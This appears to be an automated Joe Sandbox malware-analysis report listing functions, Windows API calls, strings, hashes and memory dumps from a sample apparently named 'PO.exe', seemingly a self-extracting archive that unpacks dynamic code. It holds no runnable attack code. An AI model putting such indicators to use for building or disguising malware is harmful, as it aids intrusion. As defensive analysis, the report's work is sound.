Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: b8d550a1b5cfa7626f6149514a2ae32344152ef2a575aefc577ce5abf0d6428f
Instruction ID: 042e738f62743ddde486658663a204d16895e9c77f17754a2818bdd16a851d89
Opcode Fuzzy Hash: b8d550a1b5cfa7626f6149514a2ae32344152ef2a575aefc577ce5abf0d6428f
Instruction Fuzzy Hash: AFE0EC36982B24EBD6215B746D0DF8B7F54AF05B52F004501F60AD6990CB78C891CFE1

Function 0017AE7D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 293COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0017B4A9

Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4

Part of subcall function 001877DE: __EH_prolog3_GS.LIBCMT ref: 001877E5
Part of subcall function 001877DE: GetLastError.KERNEL32(0000001C,0017B459,?,00000000,00000086,?,B19080A7,?,?,?,?,?,00000000,001A0349,000000FF), ref: 001877FD
Part of subcall function 001877DE: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,001A0349,000000FF), ref: 00187836

Strings

%ls, xrefs: 0017AF0C

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ErrorLast$H_prolog3_Init_thread_footer_wcslen
String ID: %ls
API String ID: 1279724102-3246610740
Opcode ID: 8e0e95cf8bd9318c5e1b9342a7bef1414eb56f090c4ab0541798ce82ea8adc35
Instruction ID: 0595540a24787430e2ac501200f71c3ea21af3761f9aa2d28d74f2406b2e0a5f
Opcode Fuzzy Hash: 8e0e95cf8bd9318c5e1b9342a7bef1414eb56f090c4ab0541798ce82ea8adc35
Instruction Fuzzy Hash: D3B1B071809209EEDB24EF64CD86BAE7BB4BF24304F21C419F54B621D1EBB46B54DB81

Function 00185FAA Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 240COMMON

Download Yara Rule

APIs

Part of subcall function 00185C33: GetDC.USER32(00000000), ref: 00185C37
Part of subcall function 00185C33: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00185C42
Part of subcall function 00185C33: ReleaseDC.USER32(00000000,00000000), ref: 00185C4D

GetObjectW.GDI32(?,00000018,?), ref: 00185FEE

Part of subcall function 00186275: GetDC.USER32(00000000), ref: 0018627E
Part of subcall function 00186275: GetObjectW.GDI32(?,00000018,?), ref: 001862AD
Part of subcall function 00186275: ReleaseDC.USER32(00000000,?), ref: 00186345

Strings

(, xrefs: 00186143

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: bc9d7f9c3e3b4f07eb2312025bf6bc99c9753d3095e06c91fbe6d263c935051a
Instruction ID: 6402300d2fdd97b437f2a5466050cca562d5397d7edd1bf07488e54104dbe3d6
Opcode Fuzzy Hash: bc9d7f9c3e3b4f07eb2312025bf6bc99c9753d3095e06c91fbe6d263c935051a
Instruction Fuzzy Hash: 2791EF716093549FC720DF29D848A2BBBE9FFC9B04F10495EF58AD3261CB70A905CB62

Function 00198558 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001986C4

Part of subcall function 001914AB: IsProcessorFeaturePresent.KERNEL32(00000017,0019147D,0018C17E,?,?,?,0018C17E,00000016,?,?,0019148A,00000000,00000000,00000000,00000000,00000000), ref: 001914AD
Part of subcall function 001914AB: GetCurrentProcess.KERNEL32(C0000417,?,0018C17E), ref: 001914CF
Part of subcall function 001914AB: TerminateProcess.KERNEL32(00000000,?,0018C17E), ref: 001914D6

Strings

., xrefs: 0019887B
*?, xrefs: 0019859B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: b63559d0858a43ca95d39679e396630d290c71714544b7807d7bcc40eb2fce06
Instruction ID: f26d657d3f8f995cf6a5d7898ba734730f263ba9fc2af9368157cd91b140abc1
Opcode Fuzzy Hash: b63559d0858a43ca95d39679e396630d290c71714544b7807d7bcc40eb2fce06
Instruction Fuzzy Hash: 5751A175E0020AAFDF14DFA8C881AADBBF5FF59314F258169E844EB341EB359E018B50

Function 0017F9D1 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0017F9DB

Part of subcall function 00174C75: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,0017FA7D,001CB1E4,-00000070,00000000), ref: 00174C9D

Part of subcall function 0017CB19: _swprintf.LIBCMT ref: 0017CB52

Strings

zipx, xrefs: 0017FABC
zip, xrefs: 0017FAC3, 0017FACD

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: CloseFindH_prolog3__swprintf
String ID: zip$zipx
API String ID: 4097574867-1268445101
Opcode ID: 2f2e68ad0c6ac5b4c4b51193b170643740c91c9844699e45e661e201ff4d0d75
Instruction ID: 12518d8b7a476e670deceb6ebe5f76f718afa7841ed63f6050fa20202decbd29
Opcode Fuzzy Hash: 2f2e68ad0c6ac5b4c4b51193b170643740c91c9844699e45e661e201ff4d0d75
Instruction Fuzzy Hash: F2518F70904218DBCB19DF68EC95BAE7BB1BF58318F14812EF409D3691DB309D86CB11

Function 0018FBA0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0018FBDF
__IsNonwritableInCurrentImage.LIBCMT ref: 0018FC93

Strings

csm, xrefs: 0018FC7D

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 00be55930afa8f424593b895d3d8946e8dc458e716e5cdd3564482c3dc9870e2
Instruction ID: 1dd008886a5fec5ec06f88a8e0496609dc35dc3674ae95e02c039871553fa050
Opcode Fuzzy Hash: 00be55930afa8f424593b895d3d8946e8dc458e716e5cdd3564482c3dc9870e2
Instruction Fuzzy Hash: C7419F34A0021CAFCF10EF68C885A9EBBB5EF55314F148169EC149B396D731AB52CF90

Function 00184B9E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00184BA5

Part of subcall function 00174FA6: __EH_prolog3.LIBCMT ref: 00174FAD

Strings

Shell.Explorer, xrefs: 00184BE1
about:blank, xrefs: 00184CA3

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: H_prolog3
String ID: Shell.Explorer$about:blank
API String ID: 431132790-874089819
Opcode ID: 9dc57bbeca739740b69a291ec50cb88ece6fcd88d68a77100a603668035314e5
Instruction ID: 91094ff62e75e010bb635a06d856fa8333b1ad3db375aed3eceb85162da78a2d
Opcode Fuzzy Hash: 9dc57bbeca739740b69a291ec50cb88ece6fcd88d68a77100a603668035314e5
Instruction Fuzzy Hash: F8413C747016029FDB18EF68D991B6A77B6BF99700F24805DE8069B2A1DF71AE00CF60

Function 00187070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 00171B78: GetDlgItem.USER32(00000000,00003021), ref: 00171BBC
Part of subcall function 00171B78: SetWindowTextW.USER32(00000000,001A2668), ref: 00171BD2

EndDialog.USER32(?,00000001), ref: 001870DB
SetDlgItemTextW.USER32(?,00000067,?), ref: 00187119

Strings

GETPASSWORD1, xrefs: 001870A8

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 9454e97e11ac7e17239c844bd62928f399d569632e51e1d0008844246de37b8f
Instruction ID: f2e2c95e3288d908767cd18e676ac1b2de645bb58242e31a70d6fda657b95a83
Opcode Fuzzy Hash: 9454e97e11ac7e17239c844bd62928f399d569632e51e1d0008844246de37b8f
Instruction Fuzzy Hash: B4110BB2508308AAD230EA649C49FFB77ACEB95700F104829F749E74C1C731ED458BB5

Function 00178C7E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00178C09: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00178C28
Part of subcall function 00178C09: GetProcAddress.KERNEL32(001BA138,CryptUnprotectMemory), ref: 00178C38

GetCurrentProcessId.KERNEL32(?,?,?,00178C79), ref: 00178D0C

Strings

CryptProtectMemory failed, xrefs: 00178CC3
CryptUnprotectMemory failed, xrefs: 00178D04

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: c59aded472f956cb085b1712dc51f494fecea7b26460c7367695242f2e44f40e
Instruction ID: 1964aaf0809587cac4553e44a04d4fd54ba29b3703e605ff66cd6ecc516f8076
Opcode Fuzzy Hash: c59aded472f956cb085b1712dc51f494fecea7b26460c7367695242f2e44f40e
Instruction Fuzzy Hash: 72115B31A462246BCB365F28DC09AAE3B74EF25760B04C109FC096B2D1CF349D418BE1

Function 0017CA6F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0017CA76

Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4

Strings

.zipx, xrefs: 0017CA90
.zx, xrefs: 0017CAB9

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: H_prolog3__wcslen
String ID: .zipx$.zx
API String ID: 3251556500-3683210447
Opcode ID: 05a6437ac255013e43e4e40e8c0b30b8ecde0bf62870a67bb533f659ab941e38
Instruction ID: 0bd89d91c30c78e8442d5db11502e7283e7efe42f471c5ba95ebfc04f6373933
Opcode Fuzzy Hash: 05a6437ac255013e43e4e40e8c0b30b8ecde0bf62870a67bb533f659ab941e38
Instruction Fuzzy Hash: 3A11307490034C9EDB05EFE4CC96ADDBBB8AF18354F048029E419BB182EB709E45CFA0

Function 0018B03E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(0001048C), ref: 0018B06B
DialogBoxParamW.USER32(GETPASSWORD1,0001048C,00187070,?), ref: 0018B094

Strings

GETPASSWORD1, xrefs: 0018B089

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: DialogParamVisibleWindow
String ID: GETPASSWORD1
API String ID: 3157717868-3292211884
Opcode ID: 77bbcad6d2536cb9fa3b7b2c516a6095aa5a4a95da39cc44d32b2069360027d1
Instruction ID: feebba3f64c19bc849bab5fb19d4657c09b2c6ebb0d6c325d4e523f839b1dff8
Opcode Fuzzy Hash: 77bbcad6d2536cb9fa3b7b2c516a6095aa5a4a95da39cc44d32b2069360027d1
Instruction Fuzzy Hash: 6E012670289248ABC726AF64DC95F9B3F69AF12309B458119F81493591C370DE80CFA2

Function 00171B78 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00177B5C: _swprintf.LIBCMT ref: 00177B9C
Part of subcall function 00177B5C: SetDlgItemTextW.USER32(?,001AE16C,?), ref: 00177C16
Part of subcall function 00177B5C: GetWindowRect.USER32(?,?), ref: 00177C4C
Part of subcall function 00177B5C: GetClientRect.USER32(?,?), ref: 00177C58

GetDlgItem.USER32(00000000,00003021), ref: 00171BBC
SetWindowTextW.USER32(00000000,001A2668), ref: 00171BD2

Strings

0, xrefs: 00171B7B

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: ItemRectTextWindow$Client_swprintf
String ID: 0
API String ID: 758586884-4108050209
Opcode ID: 811c84b9fe35ac4a0a23fb546af70fe34bdeeb8ecd16ae42e33c6531c2362d3e
Instruction ID: fe3e1f9fdc242de18e8f3e3f6c2799f7ed9c76beab8f713d2f6a8995daf13e85
Opcode Fuzzy Hash: 811c84b9fe35ac4a0a23fb546af70fe34bdeeb8ecd16ae42e33c6531c2362d3e
Instruction Fuzzy Hash: E1F03130108248BBDF191FA99C09EB93F78AB1A305F04C014FC8D56592D774D895DAA0

Function 0018C18D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0018C199

Part of subcall function 0018C11B: std::exception::exception.LIBCONCRT ref: 0018C128

Part of subcall function 0018DD8A: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,?,?,0018C18C,?,001ABFA0,?), ref: 0018DDEA

___delayLoadHelper2@8.DELAYIMP ref: 0018C1BF

Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B

Strings

@Ut, xrefs: 0018C1AD, 0018C1B9

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: AccessDloadExceptionRaiseSectionWrite$AcquireHelper2@8LoadRelease___delaystd::exception::exceptionstd::invalid_argument::invalid_argument
String ID: @Ut
API String ID: 2834720752-141846247
Opcode ID: 60faebab791d9d24becdfabd0ba8a24da875a4dfe187bd0520ecce3ee37f082e
Instruction ID: 09eb46d6c03a76f7a13b68752c3d61edf2e72f5ca437857b1c664254d7a7bd36
Opcode Fuzzy Hash: 60faebab791d9d24becdfabd0ba8a24da875a4dfe187bd0520ecce3ee37f082e
Instruction Fuzzy Hash: D0D05BED904148BED704B6E0DD57C7D772C8B55700B508556F910D1483D7B06B154FF1

Function 00177B12 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000064,00000000,00000000,?,?,?,00000000,0000005C,B19080A7), ref: 00177B17
FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00177B25

Strings

RTL, xrefs: 00177B1F

Memory Dump Source

Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 27e9a7e5b91b22c9631e89458ee3ecb4461f18b27fbac7fd4b5de79ee736d7c5
Instruction ID: e71527b9057f6ebf25998621916b82c9b4d17113ca241bc03a5f84acbe2b3ed4
Opcode Fuzzy Hash: 27e9a7e5b91b22c9631e89458ee3ecb4461f18b27fbac7fd4b5de79ee736d7c5
Instruction Fuzzy Hash: F6C01231648B11AAE63117797D4DB833A68AB02B11F068548F541DB8C0DAF6E8C1CBA0

Analysis Process: PO.exePID: 7532, Parent PID: 6412COMMON

Execution Graph

Execution Coverage:	13.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	230
Total number of Limit Nodes:	11

Executed Functions

Function 070E4FE8 Relevance: 6.7, Strings: 5, Instructions: 477
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 070E561E
$]q, xrefs: 070E5608
'T, xrefs: 070E5552
$]q, xrefs: 070E56D0
$]q, xrefs: 070E56BA

Memory Dump Source

Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_70e0000_PO.jbxd

Similarity

API ID:
String ID: 'T$$]q$$]q$$]q$$]q
API String ID: 0-203493588
Opcode ID: aab71b670e7e889d1fce9343b6f3e61de46a8c86f486602b9046b1b9aa109210
Instruction ID: 8ac1eea88e989f3b29cb8fa9ef049ee347be2b16db4e90ac58e051eb492f2508
Opcode Fuzzy Hash: aab71b670e7e889d1fce9343b6f3e61de46a8c86f486602b9046b1b9aa109210
Instruction Fuzzy Hash: 0A2223B4E15218CFDB18CFA5D98479DBBB6FF89300F20996AD419AB364DB309941CF14

Function 070E4FD8 Relevance: 4.2, Strings: 3, Instructions: 459
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 070E5608
'T, xrefs: 070E5552
$]q, xrefs: 070E56BA

Memory Dump Source

Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_70e0000_PO.jbxd

Similarity

API ID:
String ID: 'T$$]q$$]q
API String ID: 0-3917162498
Opcode ID: 4af9d077977439e75bcaa961a87d79b1cc75535d0f9e19951a546c650ce50aa7
Instruction ID: b01c1df9def1eed64b8c66cd8e84c5d263390c15504ab48aac0f43f6ea14719d
Opcode Fuzzy Hash: 4af9d077977439e75bcaa961a87d79b1cc75535d0f9e19951a546c650ce50aa7
Instruction Fuzzy Hash: 9F1223B4E15218CFDB18CFA5D98479DBBB2FF89300F20996AD419AB364DB309981CF14

Function 070E539C Relevance: 4.0, Strings: 3, Instructions: 221
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 070E5608
'T, xrefs: 070E5552
$]q, xrefs: 070E56BA

Memory Dump Source

Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_70e0000_PO.jbxd

Similarity

API ID:
String ID: 'T$$]q$$]q
API String ID: 0-3917162498
Opcode ID: bfe53beb6090393a0f9f5b785a39c351d56837c72acb873a9ea848a7193e70ef
Instruction ID: aade9b25fc4a9b30c900693e106918ff96490e6005189ea81a06911c8aeecf8f
Opcode Fuzzy Hash: bfe53beb6090393a0f9f5b785a39c351d56837c72acb873a9ea848a7193e70ef
Instruction Fuzzy Hash: 67A105B4E14218CFDB14CFA5DD84B9DBBB6FF89304F2089AAD409A7264DB309991CF15

Function 070E5387 Relevance: 4.0, Strings: 3, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 070E5608
'T, xrefs: 070E5552
$]q, xrefs: 070E56BA

Memory Dump Source

Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_70e0000_PO.jbxd

Similarity

API ID:
String ID: 'T$$]q$$]q
API String ID: 0-3917162498
Opcode ID: 1e8353e9845428cfefa07ec054fe60e30f2d56faf4104515f61d49ce6cb3e9da
Instruction ID: 32d6d2ab33bdb1cb58bba5b66c13d016e337b86076c4f636d7385428e562891e
Opcode Fuzzy Hash: 1e8353e9845428cfefa07ec054fe60e30f2d56faf4104515f61d49ce6cb3e9da
Instruction Fuzzy Hash: C4A105B4E14218CFDB14CFA5DD84B9DBBB6FF89304F2089AAD409A7264DB309991CF15

Function 070E540F Relevance: 3.9, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

$]q, xrefs: 070E5608
'T, xrefs: 070E5552
$]q, xrefs: 070E56BA

Memory Dump Source

Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_70e0000_PO.jbxd

Similarity

API ID:
String ID: 'T$$]q$$]q
API String ID: 0-3917162498
Opcode ID: 115e90b76879d2c39a142e4bb9f6fc402b4b87a7dc664e962302fe460b991a11
Instruction ID: a421d21e827e1ee3a82c5814b15f9cd24d41038b05a36d2a2b0c1f1a3f7d87b5
Opcode Fuzzy Hash: 115e90b76879d2c39a142e4bb9f6fc402b4b87a7dc664e962302fe460b991a11
Instruction Fuzzy Hash: 3B91E2B8E14218CFDB14CFA5D985B9DBBB6FF89200F2085AAE409A7364DB305991CF15

Function 070E2C18 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2163120218.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_70e0000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e00cfc60dca68f0334699df68bbfa5f6ecc7ad36e70292629b8be41da508231f
Instruction ID: 9ceb12fb8c544a8a01d9aa1da77adc29569aa3637f365b45cf787ce0a41602d0
